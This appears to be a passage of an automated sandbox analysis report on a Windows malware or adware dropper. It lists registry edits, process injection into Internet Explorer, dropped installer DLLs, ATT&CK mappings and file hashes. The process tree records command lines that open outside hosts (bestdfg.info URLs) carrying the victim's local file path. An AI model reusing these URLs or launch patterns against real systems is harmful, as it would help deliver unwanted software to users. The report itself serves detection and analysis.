Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05589FAF-C356-11CE-BF01-00AA0055595A}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{70E102B0-5556-11CE-97C0-00AA0055595A}\FilterData = 02000000000040000100000000000000307069330200000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\CLSID = "{6A08CF80-0E18-11CF-A24D-0020AFD79767}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{59CE6880-ACF8-11CF-B56E-0080C7C4B68A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB6-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D3588AB0-0781-11CE-B03A-0020AF0BA770}\FilterData = 02000000000040000200000000000000307069330d0000000000000001000000000000000000000030747933000000006000000070000000317069330d00000000000000010000000000000000000000307479330000000080000000700000007669647300001000800000aa00389b71000000000000000000000000000000006175647300001000800000aa00389b71	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{70E102B0-5556-11CE-97C0-00AA0055595A}\FriendlyName = "Video Renderer"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\CLSID = "{E436EBB6-524F-11CE-9F53-0020AF0BA770}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\CLSID = "{D51BD5A1-7548-11CF-A520-0080C77EF58A}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\CLSID = "{D51BD5A5-7548-11CF-A520-0080C77EF58A}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\CLSID = "{E436EBB5-524F-11CE-9F53-0020AF0BA770}"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A5-7548-11CF-A520-0080C77EF58A}	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

FunshionInstall_C105806.exe

pid	process
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe
2148	FunshionInstall_C105806.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

IEXPLORE.EXE

pid process

2028 IEXPLORE.EXE
2028 IEXPLORE.EXE
2028 IEXPLORE.EXE
2028 IEXPLORE.EXE
2028 IEXPLORE.EXE
2028 IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 30 IoCs

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
1596	IEXPLORE.EXE
1596	IEXPLORE.EXE
1596	IEXPLORE.EXE
1596	IEXPLORE.EXE
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
1196	IEXPLORE.EXE
1196	IEXPLORE.EXE
1196	IEXPLORE.EXE
1196	IEXPLORE.EXE
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
1152	IEXPLORE.EXE
1152	IEXPLORE.EXE
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
1596	IEXPLORE.EXE
1596	IEXPLORE.EXE
2028	IEXPLORE.EXE
2028	IEXPLORE.EXE
2500	IEXPLORE.EXE
2500	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exeiexplore.exeIEXPLORE.EXEiexplore.exeiexplore.exeiexplore.exe

description	pid	process	target process
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1624	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 1624 wrote to memory of 2028	1624	iexplore.exe	IEXPLORE.EXE
PID 1624 wrote to memory of 2028	1624	iexplore.exe	IEXPLORE.EXE
PID 1624 wrote to memory of 2028	1624	iexplore.exe	IEXPLORE.EXE
PID 1624 wrote to memory of 2028	1624	iexplore.exe	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1596	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 268	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 268 wrote to memory of 1852	268	iexplore.exe	IEXPLORE.EXE
PID 268 wrote to memory of 1852	268	iexplore.exe	IEXPLORE.EXE
PID 268 wrote to memory of 1852	268	iexplore.exe	IEXPLORE.EXE
PID 268 wrote to memory of 1852	268	iexplore.exe	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1196	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 516	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 516 wrote to memory of 384	516	iexplore.exe	IEXPLORE.EXE
PID 516 wrote to memory of 384	516	iexplore.exe	IEXPLORE.EXE
PID 516 wrote to memory of 384	516	iexplore.exe	IEXPLORE.EXE
PID 516 wrote to memory of 384	516	iexplore.exe	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 2028 wrote to memory of 1152	2028	IEXPLORE.EXE	IEXPLORE.EXE
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 940 wrote to memory of 1744	940	eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe	iexplore.exe
PID 1744 wrote to memory of 988	1744	iexplore.exe	IEXPLORE.EXE
PID 1744 wrote to memory of 988	1744	iexplore.exe	IEXPLORE.EXE
PID 1744 wrote to memory of 988	1744	iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe
"C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:940

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=1128&i=ie&70082f639ade117ec15d5d48c71ea29bf1c4870c=70082f639ade117ec15d5d48c71ea29bf1c4870c&uu=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=1128&i=ie&70082f639ade117ec15d5d48c71ea29bf1c4870c=70082f639ade117ec15d5d48c71ea29bf1c4870c&uu=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2028

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1596

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:1455119 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1196

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:1258514 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1152

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:1192990 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1588

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:2503707 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2500

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
PID:1852

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
PID:384

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
- Suspicious use of WriteProcessMemory
PID:1744

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
PID:988

C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2148

C:\Windows\system32\regsvr32.exe
regsvr32.exe /s "C:\Windows\system32\quartz.dll"
3⤵
- Registers COM server for autorun
- Modifies registry class
PID:2188

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\Windows\system32\quartz.dll"
3⤵
PID:2204

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
PID:2316

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
PID:2324

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
2⤵
PID:2468

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=1128&ur=C:\Users\Admin\AppData\Local\Temp\eb484dc10ce14575e71388e27ecde34db82d5701fe364acfb3ab3f5daac62708&70082f639ade117ec15d5d48c71ea29bf1c4870c
3⤵
PID:2480

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4ZO7G47H.txt
Filesize
601B

MD5
fde25d6ca99a028add4fe171f9626ff6

SHA1
e5070bd0a4cbe25b7e322b802aba553bdff5e862

SHA256
c2afb04df0139e15fd9976fc15d235aad70778f2febecef9de2275a60439838d

SHA512
ca182301d3ee724c6d7372c40982ef43e34085437f6d085ceca3333433ae7b594c8f8ad17827e756db2f3b535935faf90f0cfb1c0b3e389d8262dbe60ffa7380

Download Submit
\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\Math.dll
Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\System.dll
Filesize
11KB

MD5
00a0194c20ee912257df53bfe258ee4a

SHA1
d7b4e319bc5119024690dc8230b9cc919b1b86b2

SHA256
dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3

SHA512
3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
\Users\Admin\AppData\Local\Temp\nsy3FEF.tmp\time.dll
Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
\Users\Admin\AppData\Local\Temp\tools\gma.dll
Filesize
484KB

MD5
0f35c14ffe3f0425e77099b618d6ebae

SHA1
6261ef267c3ea44a3698b73f207bc1f78f98c89d

SHA256
5a5a180569b9dc51e0a80405ee875e202a464cbe2ed712c86f3e79c0b61599ea

SHA512
7a166e8c79fb24e9b02f7f9e464d75c05dbfc6a428ce6067475520afaa84b999c4f9b701be91193b302eb3f024d6a2390c0fa4af5ec635ab6812aeb834dbde4f

Download Submit
memory/940-54-0x0000000076411000-0x0000000076413000-memory.dmp

Filesize
8KB

Download
memory/2148-67-0x0000000000000000-mapping.dmp

Download
memory/2188-73-0x0000000000000000-mapping.dmp

Download
memory/2188-74-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp

Filesize
8KB

Download
memory/2204-75-0x0000000000000000-mapping.dmp

Download